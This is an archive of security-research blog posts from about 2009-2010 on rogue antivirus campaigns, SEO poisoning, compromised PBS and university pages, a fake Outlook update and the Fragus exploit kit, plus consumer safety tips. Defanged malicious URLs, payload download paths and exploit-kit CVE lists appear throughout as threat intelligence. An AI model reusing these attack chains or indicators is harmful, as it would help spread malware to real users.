Scammers Cashing in on Facebook ‘Un named’ App Hoax

January 30, 2010

Posted by: Barracuda Labs

On Wednesday, a seemingly harmless application listing glitch sent numerous users into believing there was a Spybot attack ongoing on Facebook. Due to the bug, an application listed as ‘Unnamed App’ appeared in some users’ application settings. Some of the users took this as the presence of a spybot which would steal their account details / passwords and perform malicious activities on their computer. Those users warned other users about it and hence the word about ‘Un named App’ spread like a fire in few hours.

Ultimately, this was a harmless bug; however, curious users turned to Google to learn more about it, and scammers saw this as a golden opportunity. The scammers soon harnessed the search query ‘unnamed app’ and poisoned search results to include sites that would redirect users to a Rogue AntiVirus serving site instead. This has become a very popular technique used by scammers in the past few months.

Clicking on search results titled ‘Unnamed App’ redirects user to Rogue AV:

Scam artists also attempted to hide from the research community by selectively redirecting only users who visited straight from Google by clicking one of the search results. Visitors (mostly researchers) who attempted to go to the malicious search result directly were redirected to http://www.cnn.com instead.

There are multiple ways to achieve this. In this case, attackers reviewed the referrer-header to check from where the user came.

Hence what was seemingly a harmless bug, was still able to perform some damage to the innocent users’ browsing experience today.

Users of the Barracuda Purewire Web Security Service are protected from this attack.

  • Share/Bookmark

Posted in Research, SEO Poisoning, Web Security | No Comments »

Online Safety: Tips to Protect Your Information

December 21, 2009

Posted by: Barracuda Labs

With the increased awareness and attention around incidents of identity theft, consumers are becoming more vigilant in how they provide personal information online. At the same time, businesses that require such information to complete a transaction also must evaluate how they collect that information online from consumers.

For example, a colleague recently forwarded the email below from Southwest requesting personal information to complete the Transportation Security Administration’s (TSA) Secure Flight verification. Because the email was sent after the flight reservation was booked, it was unclear to the recipient whether or not the email was legitimate. Upon examination, it is clear that this is a legitimate email from Southwest; however, it is one that could easily be forged by a spammer or hacker attempting to collect a user’s personal information.

As people are making final travel arrangements and gift purchases online in this last week leading up to the holidays, Barracuda Networks has compiled a number of tips to help consumers discern legitimate emails and Web sites from malicious attempts, as well as recommendations for businesses to better serve their consumers online.

Online consumer safety:

1. Real or fake? Do not click on links included in an email. Instead, type the address directly into your Internet browser.

2. Email security and anti-virus solutions up-and-running. Make sure you have a strong email security solution in place that can block spam and phishing emails as well as detect and block viruses and other malware (including malicious Web links) contained in the email. As an extra precaution, make sure your desktop anti-virus protection is up-to-date and running. This will keep any viruses/malware not sent over email from infecting your computer or adding you to a larger botnet.

3. Strong Web filtering. Having a strong Web filter in place will allow you to block access to potentially dangerous Web sites. Web filters can block downloads by file type and applications that access the Internet (i.e. IM, music services, etc.) that are often used by hackers as a means of transporting malware onto your computer.

4. When in doubt, check it out. If you receive an email from a business that you recently have done an online transaction with – retail, bank, airline, etc. – and are not sure of its authenticity, check it out. Call or email the business to verify that the request is legitimate. Also, you can go directly to that company’s Web site to look for warnings listed of recent Web scams that have targeted the business.

Helping businesses serve customers:
1. On-site, at-once. Request all necessary customer information at the time of purchase, while the consumer is on the Web site. In the case of the Southwest email, if the consumer had been directed to the “MySouthwest Account” to provide this information at the time of flight reservation and purchase, it would have expedited the process for the consumer and eliminated the need to send a follow up email that raised the suspicion of the recipient.

2. Avoid follow up email. Consumers are likely to be more suspicious of emails requesting that they log back into – or create – an account to provide personal information.

3. Provide clear instructions. If sending a follow up email to complete the transaction is unavoidable, provide a clear message to the consumer at the end of the initial online transaction – before they leave the Web site – so that they know to expect an email that will require additional information and what that required information will be.

4. Privacy Policy. Be sure to provide a privacy policy that’s easy to find and is clear on what the Web site will and won’t do with the information entered.

5. Protect customer information on your site. Businesses are responsible for ensuring that the customer information that it collects online is protected from those with malicious intent. Implementing a strong Web application firewall protects the business Web site from being hacked and customer information from being stolen.

The underlying goal here is to enure that businesses that legitimately require user information receive it in a timely and secure fashion. That will keep the bad guys out of consumer’s wallets and bank accounts, and from stealing their identities.

If you look at the email you will see that we have identified the hyperlinks take you to a legitimate Southwest domain. We know it is a legitimate Web site because the URL contains the Southwest domain.

  • Share/Bookmark

Posted in Email Security, ID Theft, Internet Security Tips, Security, Web Security | No Comments »

Yet Another Reputable Site Asks You to Install Rogue AV

December 18, 2009

Posted by: Barracuda Labs

Yet another reputable site has fallen victim to compromise — University of Arkansas.

This Tuesday, Barracuda’s Malicious Javascript Detection engine (MJD) identified Rogue AV software being distributed from a page that belongs to the University of Arkansas Web site. When users accessed a particular page from the university Web site, it opened a window warning them about their computer being infected with viruses and then subsequently downloaded an anti-virus software which was identified to be a fake anti-virus software.

A forensic analysis of the attack revealed that the user requested the following:

hxxp://bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html

which in turn requested a javascript from a malicious domain via script include:

hxxp://xrusx.com/counter.php?sref=bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html

which contained further malicious javascript includes that generated fake warning messages on the user’s computer.

And ultimately attempted to download setup.exe:

setup.exe was linked off another malicious domain:

hxxp://www.loker.us/forum/attachments/setup.exe

While investigating deep into the tracks of the user to determine how the user got to this page, we made yet another interesting discovery. Our investigation could not find user browsing a page linking directly off Universityof Arkansas linking the malicious page that was distributing the Rogue AV. Instead, it was a Bing search result that lead user to this page. Specifically, one customer using the Barracuda Purewire Web Security Service searched for ‘georigainmatequery’ on Microsoft Bing search engine.

hxxp://www.bing.com/search?q=georgiainmatequery

Which yielded following results:

As you can see, the malicious link from uArk.edu shows up in the bing search results — and in the number two spot. The page is leveraging uArk.edu’s reputation ranking in what we’ve previously reported on as SEO poisoning (see previous post). This is becoming increasingly more popular as hackers are targeting vulnerabilities in legitimate Web sites since it makes the malicious page more likely to be visited. While search engines have been proactively adding malware scanning in their arsenal, legitimate Web site owners also need to take proactive steps to keep their site free of such malicious content.

Customers using the Barracuda Purewire Web Security Service are protected from this attack.

  • Share/Bookmark

Posted in Research, SEO Poisoning, Security, Web Security | No Comments »

Web Security: Be Careful Clicking on the Google Doodle

December 15, 2009

Posted by: Barracuda Labs

It’s been widely reported that Google sponsored links are being used for malicious purposes. Once again, Google is an easy target and consumers are vulnerable. Rogue AV continues to be a big business, and the criminals are taking advantage of the more popular (and trafficked) areas to spread their wares.

Today, December 15, 2009, is the 150th birthday of LL Zamenhof, the inventor of Esperanto (an international auxiliary language).

Google celebrated by decorating its logo with the flag of Esperanto, turning it into what is called a Google Doodle (Google often uses its logo to celebrate various historical events etc http://www.google.com/logos/).

Clicking on the Google Doodle performs a search for the term “LL Zamenhof” – making it remain steady in the top 5-10 most popular searches of the day. Malware distributors have recognized this significant opportunity to concentrate their poisoning efforts on popular search terms. This is just another egregious act of criminals using these Google popular search terms – and SEO poisoning – as vehicles to carry out their malicious intent.

On page one of the search results, one of the examples falls under the domain rubbermouse.com —- The poisoned results point to legitimate domains that have been compromised. This leverages the site’s already good Google reputation so that the results do not appear with a Google safesearch alert. This is becoming increasingly more common for almost any popular search term.

Once the user clicks on the link, he/she is then re-directed to a Rogue AV site (hxxp://antyspywaretoday.net….). On this page, the user is given a warning that the computer might be infected, a fake scan ensues, then the user is prompted to purchase the AV software — regardless if the user clicks on the “OK” or not.

How prevalent is this? First 100 results, there are 31 poisoned sites. Even better, first 50 results, there are 27 poisoned sites. These criminals get search engine optimization – and are good at it!

The sites are hard to identify – and hard to remove – since they are designed to re-direct to multiple sites (some with malicious intent such as selling Rogue AV, and some offering up nothing more than a waste of time via a fake search site). Regardless, these rogue orphan pages exist and are under the control of those who can, with the push of a button, offer up dangerous exploits to attack users, steal information, and damage corporate networks.

What’s most concerning about this – Google is posting its Doodle, inviting users to click (out of their own curiosity, they will), and then serving up more than half of the results as malicious. What does that say about the current state of search and SEO?

Below are several screenshots taken from this experiment.

GoogleDoodle1 – Google Doodle from today 12/15/09.

GoogleDoodle2 – First results: at first, these look good. Upon further review, the entry with the link sio.ucsd.edu/cop15/newsroom/?byza=6 shows that it’s gibberish… The site is most likely compromised, but it’s down as of this writing.

GoogleDoodle3 – Most of the results in this image are poisoned and clicking on the rubbermouse.com link provides GoogleDoodle4 (see below).

GoogleDoodle4 – Once clicking on rubbermouse, the user is then redirected to the fake antivirus site regardless of which button is pressed.

GoogleDoodle5 – This additional prompt attempts to reassure the user about downloading the payload. Until the payload is downloaded, the user is not really infected.

GoodleDoodle6 – This Web page is carefully crafted to mimic the Windows look and feel, but it’s still a Web page. A javascript animation makes it look like the user’s computer is being scanned and threats are being found. Nothing of the sort is taking place.

GoogleDoodle7 – Once it’s done “scanning” the user is then served this page — and there are no mouse options at this point.

GoogleDoodle8 – This is an attempted delivery of the payload. Until the user clicks “run” on one of these dialogs, he/she is not infected. If the user does click, the program will install (in this case, Internet Antivirus Pro) but does nothing real other than nag the user for money so that it can be ‘activated’ for use. These fake antivirus programs (Rogue AV) purport to find many threats, but in fact do not find or fix anything at all.

GoogleDoodle9 – This image shows the Internet traffic generated by this click. From the compromised site rubbermouse.com, it goes to a free Webhost in Poland which redirects the browser to an intermediary, godotscan.com. This site then redirects the browser to the final malicious site, docipge.cn. This site will most likely be active for only a few days before it’s replaced by a new landing site.

  • Share/Bookmark

Posted in Research | No Comments »

Preview to a Possible Future of Rogue AV

December 2, 2009

Posted by: Barracuda Labs

Yesterday, Purewire’s Malicious Javascript Detection (MJD) engine identified the following malicious URL:

hxxp://unsoft.eu/hitin.php?affid=02992

The site uses a now ubiquitous social engineering lure: fake javascript-generated alerts that claim the user’s system is infected with malware:

If the user believes these alerts to be genuine, the following Rogue AV software (called “Privacy Center”) will end up installed on their system:

The above screenshots well-represent what Rogue AV looks like today. But what about the Rogue AV of tomorrow? The investigation of other malicious domains related to unsoft.eu yielded the discovery of one such future vision of rogue software.

The story of this vision begins at newtunesclub.com, which resolves to the same IP address as unsoft.eu. However, instead of serving the user fake pop-up scanners and alert notifications, the site claims to act as a media distribution portal:

In addition, unlike some rogue software operations, newtunesclub.com is well put-together and includes a functioning search engine. As an example, the top result of a search for “Troy” is the 2004 movie of the same name; clicking on the result presents the user with accurate release and cast information, a series of movie stills, and a link to download the movie:

Yet, instead of a large movie, a small executable is served when the user clicks on the Download button. This executable has the same icon as the Rogue AV software served off of unsoft.eu:

In addition, about half of the few VirusTotal detections identify the above Troy executable as Rogue AV:

http://www.virustotal.com/analisis/4f40e8bb48d660a8b3d13d19f401a2f831469e
aa7dd6607be872860d0c7ef1c3-1259366297

However, the similarities between these two binaries end at identical icons and similar AV detections. When Troy.exe is run, a larger executable is downloaded from the following location:

hxxp://iqmediamanager.com/download/0

This larger binary is automatically executed and installs an interesting type of rogue software (called “IQ Manager”) on the user’s system:

Before IQ Manager even attempts to connect outbound, a child window appears, stating that there are “no empty spots” in the “shared channel”, and that the user must “wait their turn” or “activate the VIP Channel”. Activation, of course, requires a credit card.

However, even if the user decides not to perform activation, the download proceeds:

Upon completion, the resulting file was indeed a playable copy of the 2004 movie Troy. Subsequent investigation into IQ Manager’s operation revealed that it acts as a BitTorrent client, using torrents offered by the popular tracker thepiratebay.org.

While current Rogue AV software offers the user almost nothing, newtunesclub.com and the IQ Manager software collectively provide a functional (if illicit) download service that will meet many users’ expectations. If this model proves financially successful for the criminals behind it, “pay for free” software could become a standard that forms the face of tomorrow’s rogue software.

Users of the PWSS are protected from this emergent threat.

  • Share/Bookmark

Posted in Research | No Comments »

Fake Microsoft Outlook Updates Spread Rogue AV

October 16, 2009

Posted by: Barracuda Labs

Yesterday, a Purewire employee received an email claiming to offer an update to his Microsoft Outlook configuration:

From: < redacted >
Date: Thursday, October 15, 2009 2:12 PM
To: < redacted >@purewire.com
Subject: Microsoft Outlook Notification for the < redacted >@purewire.comYou have (6) New Message from Outlook Microsoft

- Please re-configure your Microsoft Outlook Again.
- Download attached setup file and install.

The email was accompanied by a zip file that contained an executable with a business-looking smart phone icon.

Install Icon

Instead of a configuration update, the file was actually a malware downloader. When executed, it downloads and installs additional malicious software from the following URL:

hxxp://uvgadferbotario.com/X1j0uHc5Htr8Lw0i4Wv6Jz7Ha

AV detections for the second-stage executable are poor:

http://www.virustotal.com/analisis/027bd581ec937628b5fd187b72a95a99f397e9f
2bcb1f6d6c8d757c872af2176-1255724269

In this case, the second-stage malware is a brand of Rogue AV software called Antivirus Pro 2010; a screenshot with examples of the different types of bogus alerts it generates is shown below.

Antivirus Pro 2010

This brand of fraudware is particularly aggressive; its tactics include the production of fake errors (about every 30 minutes) that require the user to either purchase the full version of the software or reboot their system.

Users of the PWSS are protected from this threat.

  • Share/Bookmark

Posted in Research | No Comments »

Twitter Trending Topics Used to Propagate Rogue AV

September 18, 2009

Posted by: Barracuda Labs

Last night, a Purewire employee was directed to a Rogue AV website after clicking on a link in a tweet that matched a popular topic. Subsequent analysis uncovered an active Rogue AV propagation campaign that attempts to lure users to malicious websites via tweets that contain popular terms searched on Twitter.

The malicious tweets draw part of their word content from Twitter’s Trending Topics list; a screenshot of the list at the time of this writing is shown below.

Twitter Trending Topics

Searches that use some of the above topics lead to these tweets, as shown in the following examples:

hxxp://securityland.cn/?uid=144&pid=3&ttl=31c48520c54

which acts as a traffic distribution system for a Rogue AV operation; the chain of redirections ends at one of the following Rogue AV distribution points:

All of the above sites serve javascript-based fake system scanners:

which attempt to compel the user to download Windows PC Defender, a brand of Rogue AV software. AV detections for the Rogue AV malware instance served are non-existent:

http://www.virustotal.com/analisis/9a155d62af5b43be29018f7d0f52875503c6d15a3
c891cb5807ed123398889ca-1253323103

Users of the PWSS are protected from this campaign.

  • Share/Bookmark

Posted in Research | No Comments »

PBS Website Compromised, Used to Serve Exploits

September 16, 2009

Posted by: Barracuda Labs

On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.

A forensic analysis of this attack revealed that the user requested the following:

hxxp://www.pbs.org/parents/curiousgeorge

which in turn requested:

hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

instead of:

hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.

PBS Login Prompt

If correct credentials are not provided, dipsy.bps.org serves an error page that looks normal:

… until you look under the hood. The end of the error page’s source:

contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:

hxxp://qxfcuc.info/f.cgi?jzo

The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015).

The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to “Send a message to ICQ #559156803; stats available under ststst02.

Users of the PWSS are protected from this campaign.

Update, Sep 18, 2:49PM ET: PBS has notified Purewire that the malicious javascript has been removed from its site.

  • Share/Bookmark

Posted in Research | 2 Comments »

The Fragus Exploit Kit

August 25, 2009

Posted by: Barracuda Labs

Recently, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious URLs backed by what was found to be Fragus, a new exploit kit that appeared in late July 2009. An example of a Fragus URL and a screenshot of its admin control panel login page are shown directly below.

hxxp://blt.kz/1/show.php?s=5015ba5606

Fragus Admin Control Panel Login

As with most modern exploit kits, Fragus serves not one, but a grab bag of exploits that attack the browser, ActiveX controls, and third party plugins. Deobfuscating the javascript served off of the above URL revealed the following function names (bodies omitted), which each attempt to exploit one or more different vulnerabilities:

directshow(): Performs heap spraying, then serves hxxp://blt.kz/1/directshow.php, which targets the Microsoft Video (DirectShow) ActiveX control vulnerability (a.k.a., MS09-032).

pdf(): Serves hxxp://blt.kz/1/pdf.php?eid=3, which targets Acrobat Reader vulnerabilities in util.printf, Collab.getIcon, and Collab.collectEmailInfo (a.k.a., CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659, respectively).

flash(): Serves hxxp://blt.kz/1/swf.php?eid=4, which targets the Adobe Flash Player integer overflow vulnerability (a.k.a., CVE-2007-0071).

aolwinamp(): Performs heap spraying, then attempts to exploit the AOL Radio AmpX (AOLMediaPlaybackControl) ActiveX control vulnerability (a.k.a., CVE-2007-6250).

snapshot(): Targets the Microsoft Access Snapshot Viewer ActiveX control vulnerability (a.k.a., MS08-041) in an attempt to have hxxp://blt.kz/1/load.php?e=6 executed.

spreadsheet(): Performs heap spraying, then attempts to exploit the Microsoft Office Web Components ActiveX control vulnerability (a.k.a., MS09-043).

ms09002(): Performs heap spraying, then attempts to exploit the Microsoft Internet Explorer 7 memory corruption vulnerability (a.k.a., MS09-002).

The above set of exploits motivates mention of two observations about the continuing evolution of the web threat landscape. First, given that Fragus targets vulnerabilities in at least seven different software components, viewing a given vulnerability as being more or less exploited than another is increasingly incompatible with the way in which it is used. Modern exploit kits will target any and all vulnerabilities that have a reasonable chance of successfully compromising a system, and unfortunately, the presence of just one vulnerable, out-of-date software component is required for that compromise to occur. Second, as one of the above vulnerabilities (MS09-043) is less than a month old, the length of time between the discovery of a vulnerability and its widespread use by criminals is shrinking. The creators of malware infrastructure are now rapidly integrating recently-discovered vulnerabilities into do-it-yourself exploit kits, and security companies must be increasingly quick to respond.

Users of the PWSS are protected from this threat.

  • Share/Bookmark

Posted in Research | No Comments »

5 Tips For Staying Safe In Social Networks

August 13, 2009

Posted by: Barracuda Labs

In case you haven’t noticed, social networking sites are taking over the Internet. They receive the most traffic; they generate the most media attention, and let’s face it: they’re where all the cool kids are hanging out. Unfortunately, as these sites become more and more popular, they also become more and more attractive as targets for attackers.

So what can you do to protect yourself from attackers? If you’re incredibly paranoid, you can just boycott all social networking sites (that’s what the Marines do). Or if that’s a little too extreme, you can always follow these five simple guidelines for protecting yourself in these environments:

1.) Don’t use “password” as your password. I know it’s easy to remember, but it’s also incredibly easy to guess. Instead, use a strong password with at least 8 characters that consists of numbers, mixed case letters, and special characters. Also, be sure to use a hard-to-guess password reset question (i.e., don’t end up like Sarah Palin’s Yahoo! account).

2.) Don’t use the same password at multiple sites. I realize this is somewhat inconvenient, but consider the alternative. If you use the same password at every site, what happens when one of your accounts is compromised? You guessed it: all of your accounts are compromised! Scary, right?! Now, go change your passwords!!!

3.) Don’t give your username and password to untrusted sites. Some legitimate sites will ask for your username and password (e.g., sites that support Facebook Connect), but you should always verify the trustworthiness of a site before you enter your credentials. When in doubt, err on the side of caution and avoid becoming yet another phishing victim.

4.) Don’t click on that! Never click on links from unknown users because they can lead you to any number of malicious destinations. Even if you trust the user, use caution because you never know when one of your friends has been compromised (not everyone reads this blog :-P ). Also, be extremely careful with shortened URLs because you have no idea where they will lead you. To be on the safe side, use an unshortener (e.g., Untiny, Unshorten, etc.) to determine a shortened URL’s final destination.

5.) Verify the trustworthiness of people by using reputation systems such as Purewire Trust and TweetGrade. Social networking sites are like the Wild Wild West of the Internet, but reputation systems aim to establish a sense of order to these sites so that users can make informed decisions in these environments. Before interacting with unknown individuals in a social networking site, you should check their reputations in one of these systems to safeguard yourself from malicious activity.

If all else fails, just remember to use common sense! When a smoking hot stranger sends you a friend request or a link, just ignore it and keep on moving.

  • Share/Bookmark

Posted in Purewire Trust, Security, Tweet Grade | No Comments »

« Older Entries
Newer Entries »